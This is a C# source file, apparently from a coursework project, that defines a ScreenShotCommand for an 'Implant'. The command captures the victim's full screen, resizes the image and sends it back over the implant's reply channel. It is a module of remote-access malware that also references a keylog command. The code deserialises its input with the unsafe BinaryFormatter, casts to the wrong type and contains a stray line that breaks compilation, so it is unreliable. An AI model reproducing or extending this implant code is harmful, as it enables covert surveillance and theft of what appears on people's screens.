using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Drawing.Imaging;
using System.Drawing;
using System.Windows.Forms;
using assignmentObjects;
using System.Drawing.Drawing2D;

namespace assignmentObjects
{
    [Serializable]
    public class ScreenShotCommand:Command
    {

        
        public override void execute()
        {
            int screenWidth = Screen.GetBounds(new Point(0, 0)).Width;
            int screenHeight = Screen.GetBounds(new Point(0, 0)).Height;
            Bitmap bmpScreenShot = new Bitmap(screenWidth, screenHeight);
            System.Drawing.
            Graphics gfx = Graphics.FromImage((Image)bmpScreenShot);
            using (gfx)
            {
                gfx.CopyFromScreen(0, 0, 0, 0, new Size(screenWidth, screenHeight));
                Implant theImplant = Implant.instance();
                bmpScreenShot = (resizeImage(bmpScreenShot,new Size(640,480)));
                theImplant.sendReply(new ScreenshotReply(bmpScreenShot));
            }
           
        }

        public override Command DeSerialize(byte[] theData)
        {
            BinaryFormatter bin = new BinaryFormatter();
            MemoryStream mem = new MemoryStream();
            mem.Write(theData, 0, theData.Length);
            mem.Seek(0, 0);
            return (KeylogCommand)bin.Deserialize(mem);
        }

        private Bitmap resizeImage(Image imgToResize, Size size)
        {
            int sourceWidth = imgToResize.Width;
            int sourceHeight = imgToResize.Height;

            float nPercent = 0;
            float nPercentW = 0;
            float nPercentH = 0;

            nPercentW = ((float)size.Width / (float)sourceWidth);
            nPercentH = ((float)size.Height / (float)sourceHeight);

            if (nPercentH < nPercentW)
                nPercent = nPercentH;
            else
                nPercent = nPercentW;

            int destWidth = (int)(sourceWidth * nPercent);
            int destHeight = (int)(sourceHeight * nPercent);

            Bitmap b = new Bitmap(destWidth, destHeight);
            Graphics g = Graphics.FromImage((Image)b);
            g.InterpolationMode = InterpolationMode.HighQualityBicubic;

            g.DrawImage(imgToResize, 0, 0, destWidth, destHeight);
            g.Dispose();

            return b;
        }
    }
}
